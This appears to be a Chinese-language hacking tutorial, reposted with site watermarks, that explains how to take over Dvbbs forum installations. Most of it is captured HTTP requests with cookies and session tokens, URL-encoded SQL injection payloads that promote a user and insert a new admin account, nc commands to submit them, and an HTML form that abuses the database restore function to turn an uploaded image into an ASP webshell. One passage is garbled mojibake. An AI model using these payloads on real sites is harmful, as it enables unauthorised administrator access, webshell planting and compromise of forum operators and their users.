作者:bkitty 文章来源:本站原创
《动网论坛权限提升漏洞》这篇文章相必大家都看了,但是怎么拿到webshell有的朋友不知道,今天我就当借花献佛,拿前不久的《再次让动网下地狱》结合起来,给大家说说利用过程。
首先是《提升漏洞》那篇文章有一点点错误,很多新手按着做就是不成功,我拿这篇文章上的的列子举列说明,抓包数据:
POST /bs/mymodify.asp?action=updat&username=4 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://210.41.235.199/bs/mymodify.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)
Host: 210.41.235.199
Content-Length: 396
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 210%2E41%2E235%2E199%2Fbs%2F=usercookies=0&StatUserID=21048347059&password=fVIy4l887ZvD956c&userhidden=&username=test&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&userid=4; upNum=0; ASPSESSIONIDASCDABTA=IEGHDLKCCHDMOBPFPFFHMNAM
网管网www_bitscn_com
title=&sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=Images%2Fuserface%2Fimage1.gif&width=32&height=32&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&usercookies=0&setuserinfo=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0%C2
接下来要加数据的是myface而不是userface
在myface=Images%2Fuserface%2Fimage1.gif后加上|||32|||32|||2003-12-30%2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理员|||1||||||120|||115|||28|||0||||||210.41.235.200|||0|||0|||0||||||0||||||level10.gif||||||fVIy4l887ZvD956c |||0|0|0%2||||||Dvbbs
把上面这段复制到ue里,全部选中就会显示出多少字节来,好我们全部选中显示是:202
我们把Content-Length: 396值加上202等于598改好后用nc提交就成啦,别人已经写了我这里就不多说了!
接下来是拿后台管理员权限啦,这里用到的是《再次让动网下地狱》里面的方法,也很简单,我们用上面的方法已经是管理员啦,不过是假的(但是有真正的管理员权限)!为什么这么说,你发个贴子就知道了!显示还是初级,所以只有你自己能看到自己是管理员,别人是看不到的,(我测试的7.0sql版是这样其它不知道)好,下面我们用固顶贴子那个方法来加后台管理员,有人说直接改管理员的密码!这个不太实际,一要人家管理员的前台和后台用户名都是admin如果前台不是你疾恢滥歉鍪牵∷晕颐且陆ㄒ桓龉芾碓闭撕牛绻巫瞿兀?BR>找个没有固顶贴子的地,如果都有就先去掉一些!随意找篇文章固顶:然后抓包!得到如下信息!
网管联盟bitsCN@com POST /bbs/admin_postings.asp?action=istop HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*
Referer: http://test.163vv.com/bbs/admin_postings.asp?action=istop
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; TencentTraveler )
Host: test.163vv.com
Content-Length: 136
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: test%2E163vv%2Ecom%2Fbbs%2F=UserID=2&usercookies=0&StatUserID=22126541672&password=P263W7IiD425kydM&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=bkitty; ASPSESSIONIDCSCSABAS=HOMDDKGDOEEPEBCBCMLANKBE; upNum=0; ASPSESSIONIDSAAARRBS=NCBNFKLDFCEJJDIMGKCPIGHL; Dvbbs=
istopaction=1&boardID=1&ID=1&title=&content=dssd&doWealth=0&dousercp=0&douserep=0&msg=&ismsg=&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7
网管u家u.bitscn@com
如图:
将getboard=1改成1,1);update [dv_user] set usergroupid=1 where userid=8;--,就是将1换成了我们要的注射语句!意思是将userid是8的用户改usergroupid的id为1也就是将你的账号弄成真正的前台管理员,这里userid要以你自己的id而定!
不过不能这样直接加上要转编码后再加上,转换后其值为:%31%2C%31%29%3B%75%70%64%61%74%65%20%5B%64%76%5F%75%73%65%72%5D%20%73%65%74%20%75%73%65%72%67%72%6F%75%70%69%64%3D%31%20%77%68%65%72%65%20%75%73%65%72%69%64%3D%38%3B%2D%2D
171字节,
这样其Content-Length值为:136+171-1=306
保存为文本文件!这里我保存为了c盘r.txt然后用nc提交。出现如图这样:
网管u家u.bitsCN.com 
就是成功啦!如果你有点怀疑的话可以这样:nc test.163.com 80<r.txt >c.htm
执行完后看c.htm是什么如果没有出错就是成功啦,大家看看成功的界面如下图:
好第一条句话执行成功,下面我们不用重新抓包啦,用刚才抓得的信息再次提交语句:1,1);insert into dv_admin (username,[password],adduser) values ('bkitty1','1e09463026046591','bkitty');--
这句话的意思是插入一个后台管理员bkitty1前台账号就是我们自己刚才提升的那个号:bkitty后台密码md5的自己改,我们来转编码得到:%31%2C%31%29%3B%69%6E%73%65%72%74%20%69%6E%74%6F%20%64%76%5F%61%64%6D%69%6E%20%28%75%73%65%72%6E%61%6D%65%2C%5B%70%61%73%73%77%6F%72%64%5D%2C%61%64%64%75%73%65%72%29%20%76%61%6C%75%65%73%20%28%27%62%6B%69%74%74%79%31%27%2C%27%31%65%30%39%34%36%33%30%32%36%30%34%36%35%39%31%27%2C%27%62%6B%69%74%74%79%27%29%3B%2D%2D
网管bitscn_com
长度自己计算一下吧,用nc提交显示成功,接下来点管理进入后台输入刚才我们提交插入的后台管理员账号和密码,显示登陆成功!可是不要高兴的太早,当我们点任何管理页面时出现如下提示:
没有权限,原因是虽然我们新建了管理员,但是没有赋给他权限!所以没有任何权限,我们打开数据库会看到管理员admin的flag值为:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36好,下面我们用语句把我们新建的账号也改成和管理员的flag值一样,就有权限啦!执行语句为:1,1);update dv_admin set flag='1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36' where username='bkitty1';--
再次转编码用nc提交显示成功!下面我们再点管理可是还是不成!晕,我有点头大怎么不成呢,忽然想起可能是cookies信息的原因,点击退出,再重新登陆一下,点管理,ok,成功。
网管论坛bbs_bitsCN_com
得到后台管理员权限是为了什么?相信大部分人都说拿到webshell,不过当我们进入后台满怀信心的点击备份数据库时,出现下图:
难不成做到最后一步了也拿 不到shell啦?呵呵,方法还是有的,如果你看过安全天使写的文章就知道啦:http://www.77169.org/Article/Class5/Class12/Class20/200407/5943.html
要我们本地够建一个提交代码,
<form action="http://[target_url]/admin_data.asp?action=RestoreData&act=Restore" method="post">
<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>
<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>
中国网管联盟bitsCN.com
<p><input type="submit" value="提交"></p>
</form>
把上面这段代码中的url改成你的url保存为htm网页格式,然后把我们前台上传 的图片改扩展名为asp,执行成功!
这样就拿到了我们想要的webshell,拿到webshll后如何提权,如何删除痕迹,就留给大家自己去做吧!打补丁前面的文章已经给出啦我这里就不现重复啦!
7.1版本人还没有测试成功!有测试成功的的朋友欢迎加入技术交流群来交流一下12175808--by bkitty
评论加载中…
